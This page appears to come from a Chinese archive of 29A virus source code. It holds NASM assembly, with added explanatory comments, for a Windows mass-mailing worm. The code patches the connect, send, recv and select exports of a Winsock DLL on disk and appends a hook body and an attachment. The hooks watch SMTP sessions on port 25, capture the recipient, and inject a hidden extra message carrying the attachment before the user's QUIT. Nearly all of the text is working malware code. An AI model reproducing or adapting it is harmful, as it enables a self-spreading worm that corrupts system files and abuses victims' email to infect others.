
📄 29a-7.008

📁 从29A上收集的病毒源码
💻 008
        call    patchAPI
        jc      near infwsErrorCloseUnmap
        add     eax,[esi+34h]
        mov     [_recv],eax

        mov     eax,~'sele'
        not     eax
        call    patchAPI
        jc      near infwsErrorCloseUnmap
        add     eax,[esi+34h]
        mov     [_select],eax

        xor     eax,eax
        mov     [esi+58h],eax

        or      dword [edi+24h],0c0000000h

        mov     eax,wsockHookSize
        add     eax,[attachmentSize]
        push    eax
        add     eax,[edi+10h]
        mov     ecx,[esi+3ch]
        xor     edx,edx
        div     ecx
        inc     eax
        mul     ecx
        mov     [edi+10h],eax

        add     eax,[edi+0ch]
        mov     ecx,[esi+38h]
        xor     edx,edx
        div     ecx
        inc     eax
        mul     ecx
        mov     [esi+50h],eax
        sub     eax,[edi+0ch]
        mov     [edi+08h],eax

        pop     eax
        add     eax,[fileSize]
        push    eax
repeatRndPadding:
        push    dword 200h
        call    rnd
        or      eax,eax
        jz      repeatRndPadding
        add     dword [esp],eax
        pop     dword [padding]

        push    dword [mapMem]
        call    UnmapViewOfFile

        push    dword [fhmap]
        call    CloseHandle

        xor     eax,eax
        push    eax
        push    dword [padding]
        push    eax
        push    dword 4
        push    eax
        push    dword [fHnd]
        call    CreateFileMappingA
        or      eax,eax
        jz      infwsErrorClose

        mov     [fhmap],eax

        xor     eax,eax
        push    dword [padding]
        push    eax
        push    eax
        push    dword 6
        push    dword [fhmap]
        call    MapViewOfFile
        or      eax,eax
        jz      infwsErrorCloseMap

        mov     [mapMem],eax

        mov     ecx,wsockHookSize
        lea     esi,[wsockHookBegin]
        mov     edi,eax
        add     edi,dword [fileSize]
        rep     movsb
        mov     ecx,[attachmentSize]
        mov     esi,[attachment]
        rep     movsb

        mov     byte [hkey],1

infwsErrorCloseUnmap:
        push    dword [mapMem]
        call    UnmapViewOfFile

infwsErrorCloseMap:
        push    dword [fhmap]
        call    CloseHandle

infwsErrorClose:
        push    dword [fHnd]
        call    CloseHandle

infwsError:
        ret

;-----------------------------------------------------------------------
; rva2raw - translate an RVA into a raw file offset via the PE section table
; Syntax: NASM, 32-bit x86
; In:    ECX = PE header (the offsets used below match IMAGE_NT_HEADERS:
;              +06h NumberOfSections, +14h SizeOfOptionalHeader)
;        EAX = RVA to translate
; Out:   CF clear, EAX = raw file offset   (a section matched)
;        CF set,   EAX unchanged           (no section matched)
; Regs:  everything except EAX is preserved by pushad/popad
; Notes: - Only the upper bound (VirtualAddress + VirtualSize) is tested, so
;          the first section whose end lies above the RVA is taken; an RVA
;          below that section's start is not rejected.
;        - `loop` decrements ECX before testing it, so a NumberOfSections of
;          0 is not treated as "no sections".
;-----------------------------------------------------------------------
rva2raw:
        push    eax                     ; result slot: sits at [esp+20h] once pushad has run
        pushad
        mov     esi,eax                 ; esi = RVA being translated
        mov     edx,ecx                 ; edx = PE header
        mov     eax,18h                 ; 18h = signature (4) + file header (14h)
        add     ax,[edx+14h]            ; + SizeOfOptionalHeader (16-bit add into ax)
        add     edx,eax                 ; edx = first section header
        movzx   ecx,word [ecx+06h]      ; ecx = NumberOfSections (loop counter)
        xor     ebp,ebp                 ; ebp = byte offset of the current section header
rva2rawLoop:
        mov     edi,[edx+ebp+0ch]       ; section VirtualAddress
        add     edi,[edx+ebp+8]         ; + VirtualSize = end RVA of the section
        cmp     esi,edi
        jb      foundDamnSect           ; unsigned: RVA < section end
nextSectPlz:
        add     ebp,28h                 ; advance by one section header (28h bytes)
        loop    rva2rawLoop
        popad                           ; no match: restore registers ...
        pop     eax                     ; ... and hand the input EAX back untouched
        stc
        ret
foundDamnSect:
        sub     esi,[edx+ebp+0ch]       ; offset inside the section
        add     esi,[edx+ebp+14h]       ; + PointerToRawData = raw file offset
        mov     dword [esp+20h],esi     ; overwrite the pushed EAX slot with the result
        popad
        pop     eax                     ; eax = raw offset
        clc
        ret

;-----------------------------------------------------------------------
; patchAPI - find an export of the mapped PE file by the first four bytes of
;            its name, then read or replace its AddressOfFunctions entry
; In:    EAX = first 4 bytes of the export name, as one dword
;        ESI = PE header of the mapped file (handed to rva2raw in ECX)
;        EBX = 0 to only read the entry; non-zero = value swapped into it
;              (the callers visible in this listing do not show how EBX is
;              set - confirm against the earlier part of the file)
;        [mapMem] = base address of the file mapping
; Out:   CF clear, EAX = previous entry value (callers above add [esi+34h],
;                        the ImageBase field, to it)
;        CF set,   EAX unchanged on any failure
; Regs:  everything except EAX is preserved by pushad/popad
; Notes: - The match is on 4 bytes only, so the first export whose name
;          starts with those bytes is selected.
;        - The name search has no count limit; it ends on a match or when
;          rva2raw rejects an entry.
;        - When EBX is non-zero the export table inside the file mapping is
;          modified, i.e. the change lands in the on-disk image.
;-----------------------------------------------------------------------
patchAPI:
        push    eax                     ; result slot: sits at [esp+20h] once pushad has run
        pushad
        mov     edi,eax                 ; edi = 4-byte name prefix to look for
        mov     ecx,esi                 ; ecx = PE header, kept for every rva2raw call

        mov     edx,[esi+78h]           ; first data-directory entry: export table RVA
        or      edx,edx
        jz      patchAPIError           ; image has no export table
        add     edx,[mapMem]            ; NOTE(review): RVA added to the mapping base without rva2raw
        mov     esi,[edx+20h]           ; export directory: AddressOfNames (RVA)
        or      esi,esi
        jz      patchAPIError
        mov     eax,esi
        call    rva2raw
        jc      patchAPIError

        mov     esi,eax
        add     esi,[mapMem]            ; esi = name-pointer array inside the mapping
        xor     ebp,ebp                 ; ebp = 2 * index (scaled by 2 below for dword entries)
hookApiLoop:
        mov     eax,[esi+ebp*2]         ; RVA of the next export name
        call    rva2raw
        jc      patchAPIError
        add     eax,[mapMem]
        cmp     [eax],edi               ; compare the first four name bytes
        je      APIFound
        add     ebp,2
        jmp     hookApiLoop
APIFound:
        mov     eax,[edx+24h]           ; export directory: AddressOfNameOrdinals (RVA)
        call    rva2raw
        jc      patchAPIError
        add     eax,[mapMem]
        movzx   ebp,word [eax+ebp]      ; ebp = ordinal index (ebp was 2*index into the word array)
        mov     eax,[edx+1ch]           ; export directory: AddressOfFunctions (RVA)
        call    rva2raw
        jc      patchAPIError
        add     eax,[mapMem]
        or      ebx,ebx
        jnz     justPatch
        mov     ebx,[eax+ebp*4]         ; EBX == 0: read the current entry only
        jmp     saveOldAddr
justPatch:
        xchg    ebx,[eax+ebp*4]         ; store the new value, keep the old one in ebx
saveOldAddr:
        mov     [esp+20h],ebx           ; return the old entry through the pushed EAX slot

        popad
        pop     eax
        clc
        ret
patchAPIError:
        popad
        pop     eax                     ; input EAX is returned unchanged
        stc
        ret

; - wsock.inc EOF -

; - wsockhook.inc BOF -

; Limit, in bytes, that my_send_get_rcpt applies when copying into rcptto.
RCPTTOLEN       equ     128

; First byte of the hook body: the code at the top of this listing copies
; wsockHookSize bytes starting here to offset fileSize of the mapped file.
wsockHookBegin:

;-----------------------------------------------------------------------
; my_connect - replacement for the connect export; records the socket of an
;              outgoing connection to TCP port 25, then forwards the call
; Stack on entry (stdcall, 3 dword arguments, callee pops 0ch):
;        [esp]    return address of the caller
;        [esp+4]  socket, [esp+8] sockaddr pointer, [esp+0ch] length
;        After pushad these sit 20h higher ([esp+20h], +24h, +28h, +2ch).
; Out:   EAX = whatever the original connect returned
; State: `sem` and `_connect_caller` are immediates inside this routine's own
;        instructions, so the routine writes to its own code. That needs the
;        hook to live in writable memory (the code at the top of this
;        listing ORs 0c0000000h into a section's characteristics field) and
;        means the saved return address is shared by all threads.
;-----------------------------------------------------------------------
my_connect:
        pushad
        call    inithook                ; ebp = load delta, used for every [label+ebp] below

        mov     eax,~'FREE'
sem     equ     $-4                     ; names the imm32 of the mov above: the busy/free flag
        cmp     eax,~'BUSY'
        je      _my_connect0            ; hook's own SMTP dialogue is running: pass through

        mov     eax,dword [esp+28h]     ; second argument: sockaddr pointer
        mov     ax,word [eax+2]         ; 16-bit field at offset 2 (sin_port, network byte order)
        cmp     ax,1900h                ; bytes 00 19 = port 25 (SMTP)
        jne     _my_connect0

_my_connect1:
        mov     eax,[esp+24h]           ; first argument: the socket
        mov     dword [listenSocket+ebp],eax ; remember it for my_send / __send / __recv

_my_connect0:
        mov     eax,[_connect+ebp]      ; address of the original connect
        xchg    [esp+20h],eax           ; put it where the return address was; eax = caller's return
        mov     [_connect_caller+ebp],eax ; patch it into the push imm32 below
        popad
        pop     eax                     ; eax = original connect; arguments are now on top of the stack
        call    eax                     ; original pops its own 0ch bytes of arguments
        sub     esp,0ch                 ; re-reserve them so the retn 0ch below balances
        push    dword 12345678h         ; placeholder, overwritten with the caller's return address
_connect_caller equ $-4
        retn    0ch

;-----------------------------------------------------------------------
; my_send - replacement for the send export; watches the data the host
;           program sends on the socket recorded by my_connect
; Stack on entry (stdcall, 4 dword arguments, callee pops 10h):
;        [esp+4] socket, [esp+8] buffer, [esp+0ch] length, [esp+10h] flags
;        After pushad these sit 20h higher ([esp+24h], +28h, +2ch, +30h).
; Out:   EAX = whatever the original send returned
; Behaviour on the tracked socket, for buffers of at least 6 bytes whose
; first four bytes match case-insensitively:
;        "RCPT"        -> my_send_get_rcpt stores the text after ':' in rcptto
;        "QUIT" + CRLF -> if rcptto is non-empty, smtp runs its own dialogue
;                         on the same connection before the QUIT is forwarded
; In every case the host's buffer is then passed to the original send, so
; the extra traffic is not visible to the host program itself.
; State: `listenSocket` and `_send_caller` are immediates inside this
;        routine's own instructions (self-modifying, shared by all threads).
;-----------------------------------------------------------------------
my_send:
        pushad
        call    inithook                ; ebp = load delta

        mov     eax,[sem+ebp]
        cmp     eax,~'BUSY'
        je      _my_send0               ; called from the hook's own dialogue: pass through

        mov     eax,-1
listenSocket    equ $-4                 ; names the imm32 of the mov above; -1 = no socket tracked
        inc     eax
        jz      _my_send0               ; value was -1: nothing tracked
        dec     eax                     ; undo the inc, eax = tracked socket

        cmp     eax,[esp+24h]           ; is this send() on the tracked socket?
        jne     _my_send0

        jmp     _my_send1

_my_send0:
        mov     eax,[_send+ebp]         ; address of the original send
        xchg    [esp+20h],eax           ; put it where the return address was; eax = caller's return
        mov     [_send_caller+ebp],eax  ; patch it into the push imm32 below
        popad
        pop     eax                     ; eax = original send; arguments are now on top of the stack
        call    eax                     ; original pops its own 10h bytes of arguments
        sub     esp,10h                 ; re-reserve them so the retn 10h below balances
        push    dword 12345678h         ; placeholder, overwritten with the caller's return address
_send_caller    equ $-4
        retn    10h

_my_send1:
        mov     esi,[esp+28h]           ; esi = buffer being sent
        mov     edi,[esp+2ch]           ; edi = its length
        cmp     edi,6
        jb      _my_send0               ; too short to hold "QUIT\r\n" or an RCPT line

        mov     eax,dword [esi]
        and     eax,~20202020h          ; clear bit 5 of each byte: ASCII letters become upper case
        cmp     eax,'RCPT'
        jne     __my_send1_2

        call    my_send_get_rcpt        ; in: esi = buffer, edi = length, ebp = delta
        jmp     _my_send0
__my_send1_2:
        cmp     eax,'QUIT'
        jne     _my_send0
        cmp     word [esi+4],0a0dh      ; bytes 0dh,0ah (CR LF) right after the verb
        jne     _my_send0

        mov     dword [sem+ebp],~'BUSY' ; make the hooks pass through while smtp runs

        cmp     byte [rcptto+ebp],0
        je      __my_send1_3            ; no recipient captured: skip the dialogue

        call    smtp

__my_send1_3:
        xor     eax,eax
        dec     eax                     ; eax = -1
        mov     dword [listenSocket+ebp],eax ; stop tracking this socket
        mov     dword [sem+ebp],~'FREE'

        jmp     _my_send0               ; finally forward the host's QUIT

;-----------------------------------------------------------------------
; my_send_get_rcpt - copy the text that follows the first ':' of an outgoing
;                    line into rcptto
; In:    ESI = buffer, EDI = length, EBP = load delta (from inithook)
; Out:   rcptto = text after ':' up to and including CR, followed by LF and
;                 a terminating 0; or an empty string (first byte 0) when no
;                 ':' was found, no CR was found, or the limit was reached
; Clobb: EAX (ax), EBX, ECX, ESI, EDI, flags - the caller restores with popad
; NOTE(review): the limit test `cmp edi,ebx` runs before each copied byte,
;        but the CR, LF and 0 are written after it without a second test, so
;        up to three bytes can land at rcptto+RCPTTOLEN and beyond. The size
;        reserved for rcptto is not visible in this part of the file.
; NOTE(review): `cmp byte [esi],0dh` after the movsb can read the byte just
;        past the end of the caller's buffer.
;-----------------------------------------------------------------------
my_send_get_rcpt:
        mov     ecx,edi
        add     ecx,esi                 ; ecx = one past the end of the source buffer
        lea     edi,[rcptto+ebp]
        mov     byte [edi],0            ; drop any previously captured recipient
my_send_get_rcpt1:
        cmp     byte [esi],':'
        je      my_send_get_rcpt0
        inc     esi
        cmp     esi,ecx
        jb      my_send_get_rcpt1
        ret                             ; no ':' in the buffer; rcptto stays empty
my_send_get_rcpt0:
        inc     esi                     ; step over the ':'
        mov     ebx,RCPTTOLEN
        add     ebx,edi                 ; ebx = rcptto + RCPTTOLEN (copy limit)
my_send_get_rcpt3:
        cmp     esi,ecx
        jnb     my_send_get_rcpt4       ; source exhausted before a CR was seen
        cmp     edi,ebx
        jb      my_send_get_rcpt2       ; still below the limit: copy one more byte
my_send_get_rcpt4:
        mov     byte [rcptto+ebp],0     ; give up: leave rcptto empty
        ret
my_send_get_rcpt2:
        movsb
        cmp     byte [esi],0dh          ; next source byte a CR?
        jne     my_send_get_rcpt3
        movsb                           ; copy the CR
        mov     ax,000ah
        stosw                           ; append LF and the terminating 0
        ret

;-----------------------------------------------------------------------
; inithook - compute the load delta and, on the first call only, rebase the
;            saved addresses of the original connect/send/recv/select
; Out:   EBP = address this code runs at minus the address it was assembled
;              for; callers use it as [label+ebp]
; Clobb: EAX, ECX, ESI, flags
; The first-call branch adds (actual address of my_connect - [_wsockhookbase])
; to the four saved addresses, then zeroes _wsockhookbase so it never runs
; again. _wsockhookbase is defined outside this part of the file; presumably
; it holds the address my_connect would have at the module's preferred base -
; confirm against its definition.
;-----------------------------------------------------------------------
inithook:
        call    _inithook0              ; call/pop: obtain the current instruction address
_inithook0:
        pop     ebp
        sub     ebp,dword _inithook0    ; ebp = load delta

        lea     esi,[_wsockhookbase+ebp]
        mov     ecx,[esi]
        jecxz   _inithook1              ; zero: fix-up already done

        lea     eax,[my_connect+ebp]    ; actual address of my_connect
        sub     eax,ecx                 ; eax = displacement to apply
        add     [_connect+ebp],eax
        add     [_send+ebp],eax
        add     [_recv+ebp],eax
        add     [_select+ebp],eax
        xor     eax,eax
        mov     dword [esi],eax         ; mark the fix-up as done
        mov     [hseed+ebp],esp         ; current stack pointer becomes the seed read by smtp
_inithook1:
        ret

;-----------------------------------------------------------------------
; smtp - run an additional SMTP dialogue on the socket in listenSocket and
;        transmit a message that ends with the _attachment data
; Called from my_send once the host program has sent "QUIT" and rcptto is
; non-empty; the busy flag (sem) is already set by the caller.
; In:    rcptto = recipient text captured by my_send_get_rcpt
; Out:   none; any failure simply ends the dialogue early
; Regs:  EBX = load delta (own call/pop), EBP = 512-byte reply buffer on the
;        stack; EAX, ECX, ESI, EDI clobbered (the caller restores with popad)
; Order on the wire, as far as this listing shows (the contents of cmd0,
; cmd1, cmd2, body0..body3 and bodyEnd are defined elsewhere):
;        cmd0 (reply checked), cmd1 + rcptto (reply checked), cmd2 (reply
;        checked), body0, [gsubject], body1, gsubject, body2, gsubject,
;        body3, _attachment, bodyEnd (reply read, result ignored)
; A reply counts as success when its first byte is '2' or '3'.
; The 8 generated bytes in rndFrom are always in the range 'a'..'p'.
;-----------------------------------------------------------------------
smtp:
        push    ebp
        mov     ebp,esp
        sub     esp,512                 ; 512-byte buffer for server replies
        push    ebp                     ; keep the frame pointer; ebp is repurposed next
        sub     ebp,512                 ; ebp = start of the reply buffer

        call    @sendMail0              ; call/pop: obtain the current instruction address
@sendMail0:
        pop     ebx
        sub     ebx,dword @sendMail0    ; ebx = load delta

        mov     ecx,8                   ; generate 8 bytes into rndFrom
        mov     eax,[hseed+ebx]         ; seed stored by inithook / previous runs
        lea     esi,[rndFrom+ebx]
fromRndLoop:
        mov     byte [esi],al
        and     byte [esi],0fh          ; keep the low nibble ...
        add     byte [esi],'a'          ; ... giving a letter 'a'..'p'
        rol     eax,3
        add     eax,[rcptto+ebx]        ; mix in the first 4 bytes of the recipient text
        inc     esi
        loop    fromRndLoop
        add     [hseed+ebx],eax         ; advance the seed for the next run

        lea     edi,[cmd0+ebx]
        call    rcchain                 ; send cmd0, CF set if the reply is not 2xx/3xx
        jc      near @sendMailOut

        push    dword sizeCmd1          ; __send(buffer, length): length is pushed first
        lea     edi,[cmd1+ebx]
        push    edi
        call    __send

        lea     esi,[rcptto+ebx]
        push    esi                     ; keep the start of rcptto on the stack
@sendMail1:
        lodsb
        or      al,al
        jnz     @sendMail1              ; scan to the terminating 0
        sub     esi,[esp]
        dec     esi                     ; esi = length without the terminator
        xchg    [esp],esi               ; stack slot = length, esi = start of rcptto
        push    esi
        call    __send                  ; send the captured recipient text

        mov     byte [ebp],0            ; so an empty read does not look like a stale reply
        push    dword 512
        push    ebp
        call    __recv

        cmp     byte [ebp],'2'
        je      @sendMail2
        cmp     byte [ebp],'3'
        jne     near @sendMailOut       ; recipient not accepted: stop
@sendMail2:

        lea     edi,[cmd2+ebx]
        call    rcchain
        jc      near @sendMailOut

        push    dword body0Size
        lea     edi,[body0+ebx]
        push    edi
        call    __send

        cmp     byte [pflag+ebx],0
        jne     weHaveSubject
        lea     edi,[gsubject+ebx]      ; pflag == 0: use the 8 generated letters as gsubject
        lea     esi,[rndFrom+ebx]
        mov     ecx,8
        mov     [ssubj+ebx],ecx         ; ssubj = length of gsubject
        rep     movsb

        jmp     skipThisSubject         ; the first gsubject slot is left empty in this case
weHaveSubject:
        push    dword [ssubj+ebx]
        lea     edi,[gsubject+ebx]
        push    edi
        call    __send

skipThisSubject:
        push    dword body1Size
        lea     edi,[body1+ebx]
        push    edi
        call    __send

        push    dword [ssubj+ebx]
        lea     edi,[gsubject+ebx]
        push    edi
        call    __send

        push    dword body2Size
        lea     edi,[body2+ebx]
        push    edi
        call    __send

        push    dword [ssubj+ebx]
        lea     edi,[gsubject+ebx]
        push    edi
        call    __send

        push    dword body3Size
        lea     edi,[body3+ebx]
        push    edi
        call    __send

        push    dword [attachmentSize+ebx]
        lea     edi,[_attachment+ebx]
        push    edi
        call    __send                  ; the attachment data copied in behind the hook body

        lea     edi,[bodyEnd+ebx]
        call    rcchain                 ; reply is read but CF is not examined

@sendMailOut:
        pop     ebp                     ; frame pointer saved after the sub esp,512
        leave                           ; release the buffer, restore the caller's ebp
        ret

;-----------------------------------------------------------------------
; rcchain - send one length-prefixed command and read the server's reply
; In:    EDI = command: first byte is the length, the text follows
;        EBP = 512-byte reply buffer (set up by smtp)
; Out:   CF clear if the reply starts with '2' or '3', CF set otherwise
;        EDI = input + 1; AL = 0f8h on the failure path
; Regs:  EBX preserved
; The success exit jumps into the middle of an instruction: `mov al,0f8h`
; assembles to the bytes B0 F8, and @rcchain1 names the second byte, which
; decodes as `clc` when executed on its own. Disassemblers that follow only
; the fall-through path will not show that clc.
;-----------------------------------------------------------------------
rcchain:
        push    ebx
        xor     ebx,ebx
        mov     bl,byte [edi]           ; ebx = length byte
        inc     edi                     ; edi = command text
        push    ebx                     ; __send(buffer, length): length is pushed first
        push    edi
        call    __send

        mov     byte [ebp],0            ; so an empty read does not look like a stale reply
        push    dword 512
        push    ebp
        call    __recv

        cmp     byte [ebp],'2'
        je      @rcchain1
        cmp     byte [ebp],'3'
        je      @rcchain1
        stc                             ; failure: CF set, then skip over the hidden clc
        mov     al,0f8h
@rcchain1       equ $-1                 ; address of the F8 byte = `clc`
        pop     ebx
        ret

;-----------------------------------------------------------------------
; __recv - wait until the tracked socket is readable, then read from it
;          through the saved addresses of the original select and recv
; Stack on entry: [esp+4] = buffer, [esp+8] = length; the routine pops both
;        (retn 8). After `push edx / mov edx,esp` they are [edx+8], [edx+12].
; Out:   data in the caller's buffer; the byte count returned by recv is
;        discarded by popad
; Regs:  all registers preserved
; The select call gets a null timeout pointer, so it waits without limit.
; fd_fdset is written as a count dword followed by one socket handle; its
; definition is outside this part of the file.
;-----------------------------------------------------------------------
__recv:
        push    edx
        mov     edx,esp                 ; edx = fixed reference to the arguments
        pushad
        call    inithook                ; ebp = load delta

        push    edx                     ; keep edx across the API call
        lea     esi,[fd_fdset+ebp]
        mov     dword [esi],1           ; set holds one socket
        mov     eax,[listenSocket+ebp]
        mov     [esi+4],eax             ; ... the tracked SMTP socket
        xor     eax,eax
        push    eax                     ; timeout    = null
        push    eax                     ; exceptfds  = null
        push    eax                     ; writefds   = null
        push    esi                     ; readfds    = fd_fdset
        push    eax                     ; nfds       = 0
        call    dword [_select+ebp]
        pop     edx
        inc     eax
        jz      __recv_out              ; select returned -1: skip the read

        push    dword 0                 ; flags
        push    dword [edx+12]          ; length
        push    dword [edx+8]           ; buffer
        push    dword [listenSocket+ebp]
        call    dword [_recv+ebp]
__recv_out:
        popad
        pop     edx
        retn    8

__send:
        push    edx
        mov     edx,esp
        pushad
        call    inithook

__send_retry:
        push    edx
        lea     esi,[fd_fdset+ebp]
        mov     dword [esi],1
        mov     eax,[listenSocket+ebp]
        mov     [esi+4],eax
        xor     eax,eax
        push    eax
        push    eax
        push    esi
        push    eax
        push    eax
        call    dword [_select+ebp]
        pop     edx
        inc     eax
        jz      __send_out

        push    edx
        push    dword 0
        push    dword [edx+12]
        push    dword [edx+8]
        push    dword [listenSocket+ebp]
        call    dword [_send+ebp]
        pop     edx
        inc     eax
        jz      __send_retry
        dec     eax
        or      eax,eax
        jz      __send_out
        cmp     eax,[edx+12]
        je      __send_out
        add     [edx+8],eax
        sub     [edx+12],eax
        jmp     __send_retry
__send_out:
        popad
        pop     edx
 
